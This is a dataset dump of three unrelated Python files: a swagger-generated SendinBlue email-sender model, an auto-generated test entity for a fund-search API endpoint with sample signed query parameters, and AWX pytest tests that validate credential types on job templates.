e0c984afcd1f4fccb80e153c90f1627ada1af52a | fe15d678aeece784bb9fdd5e7211bedab98f79ea | /sib_api_v3_sdk/models/send_smtp_email_sender.py | fa3c3f0de73ba8dcd2e349ffefac9f341ff96cb2 | [
"MIT"
] | permissive | Edraak/APIv3-python-library | bec8014814ca5a3eaa98dad0f9a3b71acc71316c | 4a97bf479d92ca08d5a2881ac37e397d3a1846b4 | refs/heads/master | 2022-04-16T18:18:37.406313 | 2020-04-10T19:02:09 | 2020-04-10T19:02:09 | 254,713,617 | 0 | 0 | MIT | 2020-04-10T19:00:58 | 2020-04-10T19:00:57 | null | UTF-8 | Python | false | false | 4,935 | py | # coding: utf-8
"""
SendinBlue API
SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable | # noqa: E501
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class SendSmtpEmailSender(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'email': 'str'
}
attribute_map = {
'name': 'name',
'email': 'email'
}
def __init__(self, name=None, email=None): # noqa: E501
"""SendSmtpEmailSender - a model defined in Swagger""" # noqa: E501
self._name = None
self._email = None
self.discriminator = None
if name is not None:
self.name = name
self.email = email
@property
def name(self):
"""Gets the name of this SendSmtpEmailSender. # noqa: E501
Name of the sender from which the emails will be sent. Maximum allowed characters are 70. # noqa: E501
:return: The name of this SendSmtpEmailSender. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this SendSmtpEmailSender.
Name of the sender from which the emails will be sent. Maximum allowed characters are 70. # noqa: E501
:param name: The name of this SendSmtpEmailSender. # noqa: E501
:type: str
"""
self._name = name
@property
def email(self):
"""Gets the email of this SendSmtpEmailSender. # noqa: E501
Email of the sender from which the emails will be sent # noqa: E501
:return: The email of this SendSmtpEmailSender. # noqa: E501
:rtype: str
"""
return self._email
@email.setter
def email(self, email):
"""Sets the email of this SendSmtpEmailSender.
Email of the sender from which the emails will be sent # noqa: E501
:param email: The email of this SendSmtpEmailSender. # noqa: E501
:type: str
"""
if email is None:
raise ValueError("Invalid value for `email`, must not be `None`") # noqa: E501
self._email = email
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(SendSmtpEmailSender, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SendSmtpEmailSender):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
3dd7c3f65e14b78958e8369738bb17b7439df1b5 | c4a57dced2f1ed5fd5bac6de620e993a6250ca97 | /huaxin/huaxin_restful_service/restful_xjb_service/v1_services_fund_findhotsearchproduct_entity.py | 937e9b0575a6717a572f56f3bd8ef4aa2b8546be | [] | no_license | wanglili1703/firewill | f1b287b90afddfe4f31ec063ff0bd5802068be4f | 1996f4c01b22b9aec3ae1e243d683af626eb76b8 | refs/heads/master | 2020-05-24T07:51:12.612678 | 2019-05-17T07:38:08 | 2019-05-17T07:38:08 | 187,169,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,811 | py | import json
from code_gen.lib.basic_troop_service_entity_handler import BasicTroopServiceEntityHandler
DOMAIN_NAME = u'10.199.111.2'
URL = u'http://%s/V1/services/fund/findHotSearchProduct?'
BODY_DATA = ''
_BODY_DATA = ''
if BODY_DATA:
_BODY_DATA = json.loads(BODY_DATA)
QUERY_DATA = u'timestamp=1495434109309&noncestr=2xtvjvg9ri7mgtdw&signature=83294161CE239E4B845F3A767E6263E9A9D25044'
METHOD_TYPE = u'get'
CONTENT_TYPE = 'json'
REQUEST_DATA = (_BODY_DATA or QUERY_DATA)
HAS_DATA_PATTERN = True
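# Pattern mirroring the signed query parameters (timestamp / noncestr / signature)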
DATA_PATTERN = {"timestam": "1495434895311", "noncestr": "mqy95mtwzkcugvqh",
"signature": "6CFA3F57564C7755C2D1002EBB2518E3B68FDAD6"}
class V1ServicesFundFindhotsearchproductEntity(BasicTroopServiceEntityHandler):
"""
accessible attribute list for response data:
%s
==================
kwargs for request:
Please refer to the constants BODY_DATA or QUERY_DATA request parameters
"""
def __init__(self, domain_name=DOMAIN_NAME, token=None, **kwargs):
super(V1ServicesFundFindhotsearchproductEntity, self).__init__(domain_name=domain_name, url_string=URL,
data=REQUEST_DATA,
method_type=METHOD_TYPE,
request_content_type=CONTENT_TYPE,
has_data_pattern=HAS_DATA_PATTERN, token=token,
**kwargs)
def _set_data_pattern(self, *args, **kwargs):
self._current_data_pattern = DATA_PATTERN
if __name__ == '__main__':
e = V1ServicesFundFindhotsearchproductEntity()
e.send_request()
| [
"[email protected]"
] | |
fe52028f642c5e303add875b04d4a7db496a04c2 | 3a458d9efb62c055542beb6685c7250910bc4fdc | /awx/main/tests/functional/models/test_job_options.py | 65add96de980233a1f7b8f1793bc264e384e6cea | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"Python-2.0",
"Apache-2.0"
] | permissive | aperigault/awx | 2e1b8c56592fdc20812b0c3841fb836d1a7a61a8 | 2ef840ce128a8028fe63b01b47bc5be5304062b2 | refs/heads/devel | 2021-11-21T03:28:31.346758 | 2021-10-12T18:19:40 | 2021-11-16T15:27:27 | 125,395,064 | 0 | 0 | Apache-2.0 | 2018-07-13T13:37:14 | 2018-03-15T16:22:23 | Python | UTF-8 | Python | false | false | 759 | py | import pytest
from awx.main.models import Credential
@pytest.mark.django_db
def test_clean_credential_with_ssh_type(credentialtype_ssh, job_template):
credential = Credential(name='My Credential', credential_type=credentialtype_ssh)
credential.save()
job_template.credentials.add(credential)
job_template.full_clean()
@pytest.mark.django_db
def test_clean_credential_with_custom_types(credentialtype_aws, credentialtype_net, job_template):
aws = Credential(name='AWS Credential', credential_type=credentialtype_aws)
aws.save()
net = Credential(name='Net Credential', credential_type=credentialtype_net)
net.save()
job_template.credentials.add(aws)
job_template.credentials.add(net)
job_template.full_clean()
| [
"[email protected]"
] |